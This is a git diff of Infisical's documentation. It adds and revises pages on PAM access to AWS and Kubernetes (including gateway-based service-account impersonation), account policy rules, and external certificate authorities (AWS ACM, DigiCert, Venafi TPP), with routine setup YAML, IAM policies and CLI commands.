diff --git a/docs/documentation/platform/groups.mdx b/docs/documentation/platform/groups.mdx index 70d39dafc2f..4c9a8828a4b 100644 --- a/docs/documentation/platform/groups.mdx +++ b/docs/documentation/platform/groups.mdx @@ -12,7 +12,7 @@ description: "Manage groups containing users and machine identities in Infisical ## Concept -A group is a collection of identities (users and/or machine identities) that you can create in an Infisical organization to more efficiently manage permissions and access control for multiple identities together. For example, you can have a group called `Developers` with the `Developer` role containing all the developers in your organization, or a group called `CI/CD Identities` containing all the machine identities used in your CI/CD pipelines. +A group is a collection of identities (users and/or machine identities) that you can create in an Infisical organization to more efficiently manage permissions and access control for multiple identities together. For example, you can have a group called `Members` with the `Member` role containing all the members in your organization, or a group called `CI/CD Identities` containing all the machine identities used in your CI/CD pipelines. Groups have the following properties: diff --git a/docs/documentation/platform/identities/kubernetes-auth.mdx b/docs/documentation/platform/identities/kubernetes-auth.mdx index f9412b92b19..eeefb5d30e9 100644 --- a/docs/documentation/platform/identities/kubernetes-auth.mdx +++ b/docs/documentation/platform/identities/kubernetes-auth.mdx @@ -207,6 +207,8 @@ In the following steps, we explore how to create and use identities for your app To configure your Kubernetes Auth method to use the gateway as the token reviewer, set the `Review Method` to "Gateway as Reviewer", and select the gateway you want to use as the token reviewer. + You can select either an individual gateway or a **Gateway Pool** for automatic failover. 
When a pool is selected, the platform routes through a healthy gateway at request time. See [Gateway Pools](/documentation/platform/gateways/gateway-pools) for more details. + ![identities organization create kubernetes auth method](/images/platform/identities/identities-kubernetes-auth-gateway-as-reviewer.png) diff --git a/docs/documentation/platform/identities/universal-auth.mdx b/docs/documentation/platform/identities/universal-auth.mdx index 18b847a4037..c99d5fa054a 100644 --- a/docs/documentation/platform/identities/universal-auth.mdx +++ b/docs/documentation/platform/identities/universal-auth.mdx @@ -177,8 +177,6 @@ using the Universal Auth authentication method. In many automated, cloud-native, or ephemeral environments (such as VMs, containers, or serverless functions), it is often unsafe or impractical to hard-code long-lived credentials for bootstrapping access to secrets management systems. The "secret zero" problem refers to the challenge of securely providing a workload with its initial credential, without manual intervention or static secrets that could be leaked or reused. Periodic tokens in Universal Auth are designed to solve this problem by enabling secure, automated bootstrapping and ongoing access renewal, even in dynamic or short-lived environments. -A common challenge in cloud-native and automated environments is the "secret zero" problem: how to securely bootstrap a workload (such as a VM, container, or serverless function) with its first credential, without hard-coding static secrets or requiring manual intervention. - **Periodic tokens** in Universal Auth solve this by allowing you to issue an access token that can be continuously renewed by your workload before it expires (i.e., a client-initiated rotation mechanism): - When you set the **Access Token Period** in the Universal Auth configuration, the issued access token can be renewed by your workload for the specified period (in seconds). 
diff --git a/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx b/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx index 58b58a81383..8975098a78d 100644 --- a/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx +++ b/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx @@ -1,14 +1,14 @@ --- title: "AWS IAM" sidebarTitle: "AWS IAM" -description: "Learn how to configure AWS Management Console access through Infisical PAM for secure, audited, and just-in-time access to AWS." +description: "Learn how to configure AWS access through Infisical PAM for secure, audited, and just-in-time access to AWS, covering both the AWS CLI and the Management Console." --- -Infisical PAM supports secure, just-in-time access to the **AWS Management Console** through federated sign-in. This allows your team to access AWS without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. +Infisical PAM supports secure, just-in-time access to AWS through STS role chaining. Each access request issues short-lived credentials that can be used directly with the **AWS CLI** or exchanged for a federated **AWS Management Console** sign-in URL. Both come from the same session, so there's no duplication and CloudTrail attribution stays consistent. ## How It Works -Unlike database or SSH resources that require a Gateway for network connectivity, AWS Console access works differently. Infisical uses AWS STS (Security Token Service) to assume roles on your behalf and generates temporary federated sign-in URLs. +Unlike database or SSH resources that require a Gateway for network connectivity, AWS access works differently. Infisical uses AWS STS (Security Token Service) to assume roles on your behalf and returns the temporary credentials. Those credentials are usable directly by the AWS CLI, and can also be exchanged for a federated console sign-in URL on demand. 
```mermaid sequenceDiagram @@ -229,9 +229,9 @@ A PAM Account represents a specific Target Role that users can request access to -## Access the AWS Console +## Access AWS -Once your resource and accounts are configured, users can request access through Infisical: +Once your resource and accounts are configured, users can request access through Infisical. A single access request creates one session whose credentials power both the CLI and (optionally) the console. Clicking **Open in AWS Console** does not start a separate session. ![Create AWS IAM Resource](/images/pam/resources/aws-iam/access-account.png) @@ -241,18 +241,47 @@ Once your resource and accounts are configured, users can request access through - In the resource’s accounts section, find the AWS Console account you want to access. + In the resource's accounts section, find the AWS account you want to access. - Click the **Access** button for that account. + Click the **Access** button for that account. Infisical will: - Infisical will: 1. Assume the Resource Role using your project's External ID 2. Assume the Target Role using role chaining - 3. Generate a federated sign-in URL - 4. Open the AWS Console in a new browser tab + 3. Return the temporary STS credentials to your browser - The user will be signed into the AWS Console with the permissions of the Target Role. + The credentials shown are valid until the configured session duration expires. + + + + The access dialog shows three fields with copy buttons: + + - **Access Key ID** + - **Secret Access Key** + - **Session Token** + + Use them however your tooling expects. Common options: + + - Export as environment variables (Bash / Zsh): + ```bash + export AWS_ACCESS_KEY_ID=ASIA... + export AWS_SECRET_ACCESS_KEY=... + export AWS_SESSION_TOKEN=... + ``` + - Equivalent `$env:` assignments in PowerShell + - Append to a named profile in `~/.aws/credentials`: + ```ini + [infisical-pam] + aws_access_key_id = ASIA... + aws_secret_access_key = ... 
+ aws_session_token = ... + ``` + + All standard AWS SDKs and tooling will pick up the credentials automatically once they are in the environment or credentials file. + + + + Click **Open in AWS Console** at the bottom of the access dialog. Infisical exchanges the same STS credentials for a federated sign-in URL and opens it in a new tab. No second session is created, and CloudTrail attribution stays consistent with your CLI activity. \ No newline at end of file diff --git a/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx b/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx index 1a9d7d1a3d6..1b4e421717d 100644 --- a/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx +++ b/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx @@ -4,11 +4,18 @@ sidebarTitle: "Kubernetes" description: "Learn how to configure Kubernetes cluster access through Infisical PAM for secure, audited, and just-in-time access to your Kubernetes clusters." --- -Infisical PAM supports secure, just-in-time access to Kubernetes clusters through service account token authentication. This allows your team to access Kubernetes clusters without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. +Infisical PAM supports secure, just-in-time access to Kubernetes clusters. Your team can access Kubernetes clusters without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. + +There are two ways to authenticate: + +- **Service Account Token** β€” you provide a static token that the Gateway injects into requests. Simple to set up, but the token is long-lived and stored in Infisical. +- **Gateway** β€” the Gateway uses its own pod identity and [Kubernetes impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) to act as a target service account. 
No tokens are stored in Infisical β€” you only provide a service account name and namespace. ## How It Works -Kubernetes access in Infisical PAM uses an Infisical Gateway to securely proxy connections to your Kubernetes API server. When a user requests access, Infisical generates a temporary kubeconfig that routes traffic through the Gateway, enabling secure access without exposing your cluster directly. +### Service Account Token + +When using a service account token, the Gateway forwards kubectl requests to the Kubernetes API server using the provided token. ```mermaid sequenceDiagram @@ -31,15 +38,46 @@ sequenceDiagram CLI-->>User: kubectl output ``` +### Gateway (Impersonation) + +When using Gateway auth, the Gateway authenticates as itself using its own pod service account, then tells the Kubernetes API to treat the request as if it came from the target service account. + +```mermaid +sequenceDiagram + participant User + participant CLI as Infisical CLI + participant Infisical + participant Gateway as Infisical Gateway + participant K8s as Kubernetes API Server + + User->>CLI: Request Kubernetes access + CLI->>Infisical: Authenticate & request session + Infisical-->>CLI: Session credentials & Gateway info + CLI->>CLI: Start local proxy + CLI->>Gateway: Establish secure tunnel + Gateway->>Infisical: Fetch session credentials (SA name + namespace) + User->>CLI: kubectl commands + CLI->>Gateway: Proxy kubectl requests + Gateway->>K8s: Forward with own token + Impersonate-User header + K8s->>K8s: Verify impersonation permission, apply target SA's RBAC + K8s-->>Gateway: Response + Gateway-->>CLI: Return response + CLI-->>User: kubectl output +``` + +No tokens are stored in Infisical. The Gateway reads its own pod token from the filesystem (auto-mounted by Kubernetes) and auto-discovers the Kubernetes API server from environment variables. + ### Key Concepts 1. **Gateway**: An Infisical Gateway deployed in your network that can reach the Kubernetes API server. 
The Gateway handles secure communication between users and your cluster. 2. **Service Account Token**: A Kubernetes service account token that grants access to the cluster. This token is stored securely in Infisical and used by the Gateway to authenticate with the Kubernetes API. -3. **Local Proxy**: The Infisical CLI starts a local proxy on your machine that intercepts kubectl commands and routes them securely through the Gateway to your cluster. +3. **Impersonation**: A Kubernetes feature where one identity (the Gateway) can act on behalf of another (the target service account). The Gateway authenticates as itself and adds `Impersonate-User` headers. Kubernetes checks if the Gateway has permission to impersonate the target, then applies the target's RBAC rules. + +4. **Local Proxy**: The Infisical CLI starts a local proxy on your machine that intercepts kubectl commands and routes them securely through the Gateway to your cluster. -4. **Session Tracking**: All access sessions are logged, including when the session was created, who accessed the cluster, session duration, and when it ended. +5. **Session Tracking**: All access sessions are logged, including when the session was created, who accessed the cluster, session duration, and when it ended. ### Session Tracking @@ -59,11 +97,13 @@ Infisical tracks: Before configuring Kubernetes access in Infisical PAM, you need: 1. **Infisical Gateway** - A Gateway deployed in your network with access to the Kubernetes API server -2. **Service Account** - A Kubernetes service account with appropriate RBAC permissions -3. **Infisical CLI** - The Infisical CLI installed on user machines +2. **Infisical CLI** - The Infisical CLI installed on user machines +3. 
Depending on your auth method: + - **Service Account Token**: A Kubernetes service account with appropriate RBAC permissions and a static token + - **Gateway**: The Gateway must be deployed **inside the Kubernetes cluster** as a pod, with a ClusterRole that allows impersonation of target service accounts - **Gateway Required**: Unlike AWS Console access, Kubernetes access requires an Infisical Gateway to be deployed and registered with your Infisical instance. The Gateway must have network connectivity to your Kubernetes API server. + **Gateway Required**: Kubernetes access requires an Infisical Gateway to be deployed and registered with your Infisical instance. For Gateway auth, the Gateway must be running as a pod inside the cluster. ## Create the PAM Resource @@ -79,90 +119,186 @@ The PAM Resource represents the connection between Infisical and your Kubernetes 1. Navigate to your PAM project and go to the **Resources** tab 2. Click **Add Resource** and select **Kubernetes** 3. Enter a name for the resource (e.g., `production-k8s`, `staging-cluster`) - 4. Enter the **Kubernetes API Server URL** - the URL to your Kubernetes API endpoint (e.g.`https://kubernetes.example.com:6443`) + 4. Enter the **Kubernetes API Server URL** - the URL to your Kubernetes API endpoint (e.g.`https://kubernetes.example.com:6443`). If using Gateway auth with an in-cluster gateway, use `https://kubernetes.default.svc.cluster.local`. 5. Select the **Gateway** that has access to this cluster 6. Configure SSL verification options if needed - **SSL Verification**: You may need to disable SSL verification if your Kubernetes API server uses a self-signed certificate or if the certificate's hostname doesn't match the URL you're using to access it. + **SSL Verification**: You may need to disable SSL verification if your Kubernetes API server uses a self-signed certificate or an in-cluster CA. 
For Gateway auth with `https://kubernetes.default.svc.cluster.local`, disable SSL verification here β€” the Gateway will use strict TLS with the in-cluster CA certificate during sessions. -## Create a Service Account - -Infisical PAM currently supports service account token authentication for Kubernetes. You'll need to create a service account with appropriate permissions in your cluster. - - - - Create a file named `sa.yaml` with the following content: - - ```yaml sa.yaml - apiVersion: v1 - kind: ServiceAccount - metadata: - name: infisical-pam-sa - namespace: kube-system - --- - # Bind the ServiceAccount to the desired ClusterRole - # This example uses cluster-admin - adjust based on your needs - apiVersion: rbac.authorization.k8s.io/v1 - kind: ClusterRoleBinding - metadata: - name: infisical-pam-binding - subjects: - - kind: ServiceAccount - name: infisical-pam-sa - namespace: kube-system - roleRef: - kind: ClusterRole - name: cluster-admin # Change this to a more restrictive role as needed - apiGroup: rbac.authorization.k8s.io - --- - # Create a static, non-expiring token for the ServiceAccount - apiVersion: v1 - kind: Secret - metadata: - name: infisical-pam-sa-token - namespace: kube-system - annotations: - kubernetes.io/service-account.name: infisical-pam-sa - type: kubernetes.io/service-account-token - ``` - - - **Security Best Practice**: The example above uses `cluster-admin` for simplicity. In production environments, you should create custom ClusterRoles or Roles with the minimum permissions required for each use case. 
- - - - - Apply the configuration to your cluster: - - ```bash - kubectl apply -f sa.yaml - ``` - - This creates: - - A ServiceAccount named `infisical-pam-sa` in the `kube-system` namespace - - A ClusterRoleBinding that grants the service account its permissions - - A Secret containing a static, non-expiring token for the service account - - - - Get the service account token that you'll use when creating the PAM account: - - ```bash - kubectl -n kube-system get secret infisical-pam-sa-token -o jsonpath='{.data.token}' | base64 -d - ``` - - Copy this token - you'll need it in the next step. - - +## Set Up Authentication + +Choose one of the two authentication methods below based on your setup. + + + + Use this method when you have a static service account token, or when the Gateway is not running inside the Kubernetes cluster. + + ### Create a Service Account + + + + Create a file named `sa.yaml` with the following content: + + ```yaml sa.yaml + apiVersion: v1 + kind: ServiceAccount + metadata: + name: infisical-pam-sa + namespace: kube-system + --- + # Bind the ServiceAccount to the desired ClusterRole + # This example uses cluster-admin - adjust based on your needs + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: infisical-pam-binding + subjects: + - kind: ServiceAccount + name: infisical-pam-sa + namespace: kube-system + roleRef: + kind: ClusterRole + name: cluster-admin # Change this to a more restrictive role as needed + apiGroup: rbac.authorization.k8s.io + --- + # Create a static, non-expiring token for the ServiceAccount + apiVersion: v1 + kind: Secret + metadata: + name: infisical-pam-sa-token + namespace: kube-system + annotations: + kubernetes.io/service-account.name: infisical-pam-sa + type: kubernetes.io/service-account-token + ``` + + + **Security Best Practice**: The example above uses `cluster-admin` for simplicity. 
In production environments, you should create custom ClusterRoles or Roles with the minimum permissions required for each use case. + + + + + Apply the configuration to your cluster: + + ```bash + kubectl apply -f sa.yaml + ``` + + This creates: + - A ServiceAccount named `infisical-pam-sa` in the `kube-system` namespace + - A ClusterRoleBinding that grants the service account its permissions + - A Secret containing a static, non-expiring token for the service account + + + + Get the service account token that you'll use when creating the PAM account: + + ```bash + kubectl -n kube-system get secret infisical-pam-sa-token -o jsonpath='{.data.token}' | base64 -d + ``` + + Copy this token - you'll need it in the next step. + + + + + + Use this method when the Gateway is deployed **inside the Kubernetes cluster** as a pod. No tokens need to be created or stored β€” the Gateway uses its own pod identity to impersonate target service accounts. + + + When creating the resource in the step above, use `https://kubernetes.default.svc.cluster.local` as the URL and **disable SSL verification**. The Gateway handles TLS with the correct in-cluster CA automatically during sessions. + + + ### Set Up Impersonation Permissions + + The Gateway's pod service account needs a ClusterRole that allows it to impersonate the target service accounts. 
+ + + + Create a file named `gateway-impersonation.yaml`: + + ```yaml gateway-impersonation.yaml + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRole + metadata: + name: infisical-gateway-impersonator + rules: + - apiGroups: [""] + resources: ["serviceaccounts"] + verbs: ["impersonate"] + resourceNames: + - "deploy-bot" # Add each SA the gateway should be able to impersonate + - "ci-runner" + - apiGroups: [""] + resources: ["groups"] + verbs: ["impersonate"] + resourceNames: + - "system:serviceaccounts" + - "system:serviceaccounts:default" # Match the namespace(s) of the target SAs + - "system:authenticated" + --- + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: infisical-gateway-impersonator-binding + subjects: + - kind: ServiceAccount + name: # The Gateway pod's own service account + namespace: + roleRef: + kind: ClusterRole + name: infisical-gateway-impersonator + apiGroup: rbac.authorization.k8s.io + ``` + + + **Scoped by `resourceNames`**: The `resourceNames` field limits which service accounts the Gateway can impersonate. If someone creates a PAM account pointing at a service account not in this list, the session will fail with a 403 from Kubernetes. This is how you control which accounts are accessible through Infisical. + + + + + ```bash + kubectl apply -f gateway-impersonation.yaml + ``` + + + + The service accounts you want to impersonate must already exist in the cluster with their own RBAC permissions. 
For example: + + ```yaml + apiVersion: v1 + kind: ServiceAccount + metadata: + name: deploy-bot + namespace: default + --- + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: deploy-bot-binding + subjects: + - kind: ServiceAccount + name: deploy-bot + namespace: default + roleRef: + kind: ClusterRole + name: view # Or whatever permissions this SA should have + apiGroup: rbac.authorization.k8s.io + ``` + + The target SA's own RBAC rules determine what the user can do during the session. + + + + ## Create PAM Accounts -Once you have configured the PAM resource, you'll need to configure a PAM account for your Kubernetes resource. -A PAM Account represents a specific service account that users can request access to. You can create multiple accounts per resource, each with different permission levels. +Once you have configured the PAM resource and set up authentication, create a PAM account to grant access. @@ -173,8 +309,11 @@ A PAM Account represents a specific service account that users can request acces Click **Add Account**. - - Fill in the account details and paste the service account token you retrieved earlier. + + Choose the authentication method: + + - **Service Account Token** β€” paste the service account token you retrieved earlier. + - **Gateway** β€” enter the **Service Account Name** and **Namespace** of the Kubernetes service account you want to impersonate. No token is needed. @@ -185,7 +324,7 @@ Once your resource and accounts are configured, users can request access through 1. Navigate to the **Resources** tab in your PAM project and open the Kubernetes resource - 2. In the resource’s accounts section, find the account you want to access + 2. In the resource's accounts section, find the account you want to access 3. Click the **Access** button for that account 4. 
Copy the provided CLI command @@ -222,3 +361,36 @@ Once your resource and accounts are configured, users can request access through You can view session logs in the **Sessions** page of your PAM project. + +## FAQ + + + + - Use **Gateway** if your Gateway is deployed as a pod inside the Kubernetes cluster. No tokens to create or manage β€” just enter a service account name and namespace. + - Use **Service Account Token** if your Gateway runs outside the cluster (e.g., on a separate VM) and only has network access to the Kubernetes API. You'll need to create a service account token and paste it into Infisical. + + + + Yes. The resource URL is still required even when using Gateway auth. For in-cluster gateways, enter `https://kubernetes.default.svc.cluster.local`. The Gateway auto-discovers the actual Kubernetes API address from its pod environment variables, so this URL isn't used for the connection itself β€” but the field is still required when creating the resource. + + + + When using Gateway auth, the Gateway reads the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT_HTTPS` environment variables that Kubernetes automatically sets in every pod. It ignores the URL configured on the resource and connects directly to the in-cluster API server. + + + + Just disable SSL verification on the resource β€” the Gateway handles TLS automatically during sessions using the in-cluster CA certificate mounted in its pod. If the CA certificate is missing or invalid, the session will fail rather than falling back to an insecure connection. + + + + The Kubernetes API server returns a 403 Forbidden error. Kubernetes itself enforces impersonation permissions β€” if the Gateway's ClusterRole doesn't include the target service account in its `resourceNames` list, the session fails. You don't need to configure any allowlist in Infisical; just update the ClusterRole in your cluster. + + + + Yes. The auth method is configured per account, not per resource. 
You can have some accounts using Service Account Token and others using Gateway on the same Kubernetes resource. + + + + For Gateway auth, yes β€” the Gateway must be deployed as a pod inside the cluster so it can read its own service account token and reach the Kubernetes API. For Service Account Token auth, the Gateway just needs network access to the Kubernetes API server and can run anywhere. + + diff --git a/docs/documentation/platform/pam/product-reference/account-policies.mdx b/docs/documentation/platform/pam/product-reference/account-policies.mdx index 8333f2f86b2..5baf51880ab 100644 --- a/docs/documentation/platform/pam/product-reference/account-policies.mdx +++ b/docs/documentation/platform/pam/product-reference/account-policies.mdx @@ -14,6 +14,7 @@ An account policy is a named, project-scoped configuration that contains one or |---|---|---| | **Command Blocking** | Prevents execution of commands matching specified regex patterns. | SSH | | **Session Log Masking** | Redacts data matching specified regex patterns from session logs. | All resource types | +| **Require Access Reason** | Requires the user to provide a reason before a session can start. The reason is stored for audit. | All resource types | A policy can be **active** or **inactive**. Only active policies are enforced during sessions. @@ -34,6 +35,7 @@ Navigate to your PAM project sidebar and click **Account Policies**, then click - **Command Blocking**: Add one or more regex patterns. Commands matching any of these patterns will be blocked during SSH sessions. - **Session Log Masking**: Add one or more regex patterns. Any data matching these patterns will be redacted in session logs. + - **Require Access Reason**: Forces the user to provide a non-empty reason before they can start a session. When the rule is active, the CLI prompts for a reason (or accepts the `--reason` flag) and the browser shows a Reason Required screen before the session is created. 
For each rule, click the **+** button to add additional patterns. @@ -87,6 +89,12 @@ Patterns use standard regular expression syntax. Some examples: Patterns are matched as regular expressions against the full command (for command blocking) or session log content (for session log masking). Test your patterns carefully to avoid overly broad matches. + + Command blocking helps prevent unintended or careless commands from reaching the target, adding a guardrail in front of systems where direct controls on the target resource aren't available. + + Because matches are evaluated with regular expressions, patterns need to cover the different ways a command might be typed, and exhaustive coverage of every variation is difficult to guarantee in practice. It is highly recommended to pair command blocking with target-side controls like restricted shells or `sudoers` rules where those are available. + + ## FAQ diff --git a/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx b/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx new file mode 100644 index 00000000000..d9f2ae91608 --- /dev/null +++ b/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx @@ -0,0 +1,174 @@ +--- +title: "AWS ACM Public CA" +description: "Issue and manage publicly-trusted certificates using AWS Certificate Manager (ACM) with Infisical." +--- + +## Overview + +Infisical integrates with AWS Certificate Manager (ACM) to issue **public certificates** signed by [Amazon Trust Services](https://www.amazontrust.com/repository/). These certificates are trusted by all major browsers and operating systems out of the box, so they can be used on the public internet without users having to install anything. + +Common use cases include securing public-facing websites and APIs, terminating TLS on internet-facing load balancers, and issuing certificates for SaaS applications exposed to external users. + +Each certificate has a fixed 198-day validity and is generated and stored by AWS. 
Infisical orchestrates the full lifecycle on top: domain validation via Route 53, saving the certificate and private key into Infisical, scheduled auto-renewal, and revocation. + + + Domain validation is performed exclusively through **Amazon Route 53**. Other DNS providers are not supported for this CA type. + + +## Prerequisites + +- Two [AWS App Connections](/integrations/app-connections/aws): one for ACM, one for Route 53. They can be the same connection if it has permissions for both services. +- A Route 53 **public** hosted zone for the domains you will issue certificates for. + +### IAM Permissions + +**ACM connection** β€” needs the following on certificates in your account: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] +} +``` + + + `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds. + + +**Route 53 connection** β€” needs the following on your hosted zone so Infisical can write the ACM validation CNAME records: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] +} +``` + +## Setup + + + + In the AWS Console, navigate to **Route 53 β†’ Hosted zones** and select the public hosted zone for the domain(s) you will issue certificates for. Copy the **Hosted Zone ID** from the details panel. + ![Copy Hosted Zone ID](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png) + + + + In your Infisical project, go to **Certificate Authorities** and scroll to the **External Certificate Authorities** section. 
+ ![External CA Page](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png) + + + + Click **Create CA** and configure: + - **CA Type**: **AWS ACM Public CA** + - **Name**: lowercase letters, numbers, and hyphens + - **AWS Connection**: the connection with ACM permissions + - **Route 53 Connection**: the connection with Route 53 permissions (can be the same as above) + - **Hosted Zone ID**: the Route 53 public hosted zone ID from the previous step + - **Region**: the ACM region to issue from + + ![External CA Form](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png) + + + + Create a certificate profile linked to this CA, then submit a certificate request. Infisical requests the certificate from ACM, writes the required CNAME(s) to Route 53, waits for ACM to finish validation, and saves the certificate and private key. + ![Certificate Created](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png) + + + +## Auto-Renewal + +ACM certificates expire after 198 days. There are two renewal paths that both end up producing a fresh certificate in Infisical. + +### AWS managed renewal + +AWS attempts to automatically renew ACM public certificates 45 days before expiry. This is [ACM managed renewal](https://docs.aws.amazon.com/acm/latest/userguide/managed-renewal.html) and happens on AWS's schedule, independent of Infisical. When it succeeds, AWS issues a new certificate body and private key under the **same ARN** but with a new serial number. + +The catch: AWS only updates the copy held inside ACM. The copy saved in Infisical still holds the old material until something pulls the new version out. 
+ +### Infisical auto-renewal + +To keep the copy stored in Infisical in sync with AWS, enable auto-renewal on the certificate profile when you create or edit it: + +- **Auto-renew**: enabled +- **Renew before days**: how many days before expiry renewal should fire (1–30 days) + +Every certificate issued through that profile inherits these values. You can also override them on an individual certificate from **Certificates β†’ Manage Renewal**. + +When a certificate reaches the configured threshold, Infisical reconciles it with AWS: + +- If AWS has **already renewed** the certificate on its own, Infisical pulls in the new certificate and private key. +- If AWS has **not yet renewed**, Infisical triggers renewal, waits for ACM to finish re-issuance, then saves the new material. + +In both cases the renewed certificate is stored as a new entry linked to the original and inherits the same auto-renewal settings β€” so the cycle continues automatically. + + + AWS generates a fresh private key on every renewal. Infisical pulls it in each time and stores it encrypted with your project's KMS key. + + +## Troubleshooting + +**`Failed to reach AWS Certificate Manager`** β€” the ACM connection credentials are invalid or missing the IAM permissions above. + +**`Failed to access Route 53 hosted zone`** β€” the Route 53 connection cannot read the hosted zone, or the Hosted Zone ID is wrong. Check `route53:GetHostedZone` and that the zone is public. + +**Request stays pending** β€” DNS validation can take several minutes. Infisical retries automatically. Verify the CNAME records exist in Route 53 and that the hosted zone is authoritative for the requested domain. + +**Renewal appears stuck** β€” immediately after renewal is triggered, ACM may not yet have the new certificate available. Infisical treats this as transient and retries until a new serial number appears on the ARN. + +## FAQ + + + + AWS issues every ACM public certificate with a fixed 198-day validity. 
+ + + + Only Amazon Route 53. Infisical writes the required CNAMEs through your Route 53 connection. + + + + No. ACM generates the key pair itself. Infisical pulls the certificate and private key from ACM and stores them encrypted. + + + + `RSA_2048`, `EC_prime256v1` (ECDSA P-256), and `EC_secp384r1` (ECDSA P-384). + + + + No. ACM does not accept subject fields beyond the common name (O, OU, C, ST, L are ignored). + + + + No. ACM applies its own policy on every issued certificate. + + + + Certificate profiles backed by AWS ACM Public CA support only **API** enrollment. EST, SCEP, and ACME rely on submitting a CSR for the CA to sign, but ACM generates the private key itself and does not accept a CSR. + + + + No. ACM Public CA only issues end-entity (leaf) certificates. + + diff --git a/docs/documentation/platform/pki/ca/digicert-direct.mdx b/docs/documentation/platform/pki/ca/digicert-direct.mdx new file mode 100644 index 00000000000..3f36b770189 --- /dev/null +++ b/docs/documentation/platform/pki/ca/digicert-direct.mdx @@ -0,0 +1,74 @@ +--- +title: "DigiCert (CertCentral Services API)" +description: "Issue OV/EV certificates from DigiCert using the CertCentral Services API with manual DNS validation." +--- + +## Concept + +Infisical can issue OV and EV TLS certificates directly from [DigiCert CertCentral](https://www.digicert.com/) using the [CertCentral Services API](https://dev.digicert.com/en/certcentral-apis/services-api.html). + +## Prerequisites + +- A [DigiCert App Connection](/integrations/app-connections/digicert) with a validated CertCentral API key. +- A CertCentral **Organization** that has been pre-validated by DigiCert +- Entitlement to either the OV or EV SSL product on your CertCentral account. + +## Create a DigiCert Certificate Authority + + + + + + Follow the [DigiCert App Connection guide](/integrations/app-connections/digicert) to store your CertCentral API key in Infisical. 
+ + + In your Certificate Manager project, navigate to **Certificate Authorities**, click **Create CA** in the External Certificate Authorities section, choose **DigiCert CertCentral** as the type, and fill out the form: + + - **App Connection** β€” the DigiCert connection you created + - **Organization** β€” the CertCentral organization that should appear on issued certificates + - **Product** β€” the CertCentral entitlement this CA will issue under + + ![DigiCert External CA Form](/images/platform/pki/digicert/digicert-external-ca-form.png) + + + + + To create a DigiCert Certificate Authority, make an API request to the [Create DigiCert CA](/api-reference/endpoints/certificate-authorities/digicert/create) API endpoint. + + ```bash Create a DigiCert CA + curl --request POST \ + --url https://app.infisical.com/api/v1/pki/ca/digicert \ + --header 'Content-Type: application/json' \ + --data '{ + "projectId": "", + "name": "digicert-ov", + "status": "active", + "configuration": { + "appConnectionId": "", + "organizationId": 112236, + "productNameId": "ssl_plus" + } + }' + ``` + + + +## Issue a certificate + +After creating the CA and a Certificate Profile, request a certificate as you normally would. The request will move through the following states: + +1. **Pending Validation**: DigiCert has accepted the order. Complete the domain control validation directly in DigiCert CertCentral. +2. Your team completes validation on the CertCentral side. +3. Infisical re-checks DigiCert. If you don't want to wait, click **Trigger Validation** on the request row to force an immediate check. When DigiCert confirms the order, Infisical downloads the certificate and chain and moves the request to **Issued**. +4. If DigiCert does not issue within 24 hours the request transitions to **Failed**. Complete validation on CertCentral and submit a new request. 
+ +## FAQ + + + + Revoking the certificate in Infisical immediately marks it `Revoked` in the local inventory + **and** submits a revocation request to DigiCert CertCentral against the underlying order. + Depending on your CertCentral account's revocation policy, DigiCert may queue that request for + administrator approval before the certificate is actually revoked on their side. + + diff --git a/docs/documentation/platform/pki/ca/venafi-tpp.mdx b/docs/documentation/platform/pki/ca/venafi-tpp.mdx new file mode 100644 index 00000000000..9761d1fb7b8 --- /dev/null +++ b/docs/documentation/platform/pki/ca/venafi-tpp.mdx @@ -0,0 +1,79 @@ +--- +title: "Venafi TPP" +description: "Learn how to issue and manage certificates using a self-hosted Venafi Trust Protection Platform (TPP) instance with Infisical." +--- + +Issue and manage certificates using a self-hosted Venafi Trust Protection Platform (TPP) instance as an external CA, with support for airgapped environments via Infisical Gateway. + +## Prerequisites + +- A [Venafi TPP Connection](/integrations/app-connections/venafi-tpp) configured in your organization +- A policy folder in your TPP instance configured with an appropriate CA template +- Network connectivity from Infisical (or an Infisical Gateway) to the TPP server + +## Setting Up Venafi TPP as an External CA + + + + In your Infisical project, go to your **Certificate Project** > **Certificate Authority** to access the external CAs page. 
